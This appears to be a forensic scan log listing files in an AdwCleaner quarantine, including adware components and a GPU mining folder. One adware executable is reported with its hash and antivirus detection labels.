          5.6s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          7.0s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.4s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.9s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          8.1s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         12.0s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
      Size . . . . . . . : 383.488 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : 6372ACB17EDB0408A739922599D27E7CD57F6197251F497E95B467B7F6C92CD8
    > Bitdefender  . . . : Gen:Variant.Zusy.221277
    > Kaspersky  . . . . : not-a-virus:HEUR:AdWare.Win32.Generic
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -1.9s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -1.8s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.4s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.2s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.2s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.7s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.6s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
